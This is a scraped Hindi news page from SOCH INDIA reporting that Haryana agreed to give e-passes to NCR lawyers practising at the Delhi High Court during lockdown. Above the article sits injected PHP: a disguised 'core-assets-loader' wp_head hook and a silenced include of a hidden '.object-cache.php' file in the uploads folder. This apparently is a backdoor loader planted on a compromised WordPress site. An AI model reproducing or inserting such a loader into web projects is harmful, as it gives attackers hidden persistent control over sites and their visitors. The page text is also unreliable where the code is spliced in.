add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); NCR में रहने वाले वकीलों को राहत, हरियाणा सरकार ई पास देने के लिए राजी – SOCH INDIA
Menu

देश
NCR में रहने वाले वकीलों को राहत, हरियाणा सरकार ई पास देने के लिए राजी

nobanner

एनसीआर में रहकर दिल्ली हाई कोर्ट में प्रैक्टिस करने वाले वकीलों के लिए एक राहत भरी खबर है. हरियाणा सरकार ऐसे वकीलों की आवाजाही को सुगम बनाने के लिए ई पास देने पर राजी हो गई है. इस बाबत सोमवार को दिल्ली हाई कोर्ट में सुनवाई हुई.

बता दें कि दिल्ली में प्रैक्टिस करने वाले नोएडा, गाजियाबाद, गुरुग्राम और फरीदाबाद के वकील लॉकडाउन की वजह से दिल्ली हाई कोर्ट नहीं आ पा रहे हैं. इसके खिलाफ दिल्ली हाई कोर्ट में दिल्ली हाई कोर्ट बार एसोसिएशन ने एक जनहित याचिका दायर की है.

वकीलों ने याचिका में दलील दी थी कि गाजियाबाद, नोएडा, गुड़गांव और फरीदाबाद जैसी जगहों से उन्हें दिल्ली आने से रोका जा रहा है जो सीधे तौर पर आर्टिकल 19 (1)(d) का उल्लंघन है.